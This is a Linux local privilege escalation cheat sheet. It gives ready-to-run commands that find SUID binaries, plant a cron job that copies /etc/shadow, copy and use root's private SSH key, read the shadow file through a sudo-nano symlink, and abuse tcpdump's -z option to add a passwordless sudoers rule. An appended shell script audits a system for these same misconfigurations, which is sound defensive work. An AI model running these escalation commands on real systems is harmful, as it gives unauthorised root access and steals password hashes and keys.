# Local Privilege Escalation

## SUID

```
find / -perm -4000 2>/dev/null 
```

Exploitation depends on what the SUID binary does. One that can read or write arbitrary files leads to grabbing SSH keys or the shadow file.

## Cron

```
# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Look at when it will run and as which user
cat /etc/crontab

# Get it to write to shadow file 
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob
```

## Readable SSH

```
# Check listing root
ls -la /root

# Check listing ssh
ls -la /root/.ssh 

# Read file (worth trying even if you can't list the contents of .ssh)
cat /root/.ssh/id_rsa

# Make SSH dir
mkdir /home/<user>/.ssh

# Copy SSH into it 
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Change Perms 
chmod o-rwx /home/<user>/.ssh/id_rsa

# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost
```

## Symlink

```
# Check sudo rights
sudo -l

# If you have sudo rights for something like nano on a specific file,
# create a symlink from that file to shadow and then read it.
# File in example is readme.txt
ln -s /etc/shadow readme.txt

# Link to proper terminal
export TERM=xterm

# Read file
sudo nano readme.txt
```

## TCPDump

```
# If tcpdump is in the sudo list then we can abuse it: -z runs a
# post-rotate command, and -Z sets the user it runs as.

# Create the file /tmp/elevate with the script below
cat > /tmp/elevate <<'EOF'
#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers
EOF

chmod +x /tmp/elevate

# -W 1 -G 1 rotates the capture after one second, triggering -z
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

sudo bash
```
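The misconfigurations listed above are exactly what a hardening check should flag before an attacker gets to them. The audit helpers below are an added example, not part of the original cheat sheet: each takes a filesystem root prefix (assumed `/` on a live host, or a constructed tree for testing), and the SUID allowlist is a constructed placeholder to be built from a known-good image.

```shell
#!/bin/sh
# Audit helpers for the misconfigurations above. Each takes a filesystem root
# prefix ("/" on a live host, or a constructed tree for testing) and prints
# one finding per line; no output means nothing was flagged.

# Cron entries writable by "other": anyone can replace a job root will run.
audit_cron_writable() {
    root="${1:-/}"
    find "$root"/etc/cron* -type f -perm -o+w 2>/dev/null || true
}

# Setuid files not on the allowlist of names expected on this host.
# The allowlist is a constructed placeholder; build it from a known-good image.
SUID_ALLOWLIST="passwd su sudo mount umount"
audit_suid() {
    root="${1:-/}"
    find "$root" -type f -perm -4000 2>/dev/null | while read -r f; do
        case " $SUID_ALLOWLIST " in
            *" $(basename "$f") "*) ;;   # expected setuid binary
            *) echo "$f" ;;              # unexpected: review it
        esac
    done
}

# Root's private SSH keys readable by group or other (public keys excluded).
audit_root_ssh() {
    root="${1:-/}"
    find "$root"/root/.ssh -type f -name 'id_*' ! -name '*.pub' \
        \( -perm -g+r -o -perm -o+r \) 2>/dev/null || true
}

# sudo rules granting an editor or tcpdump: the symlink and -z tricks above
# turn "sudo for one file/command" into arbitrary file access as root.
audit_sudo_rules() {
    root="${1:-/}"
    cat "$root"/etc/sudoers "$root"/etc/sudoers.d/* 2>/dev/null \
        | grep -v '^[[:space:]]*#' \
        | grep -E '(^|[/[:space:]])(nano|vi|vim|tcpdump)([[:space:]]|$)' || true
}

# Run all checks against a root prefix (default "/").
audit_all() {
    for check in audit_cron_writable audit_suid audit_root_ssh audit_sudo_rules; do
        echo "== $check"
        "$check" "${1:-/}"
    done
}
```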


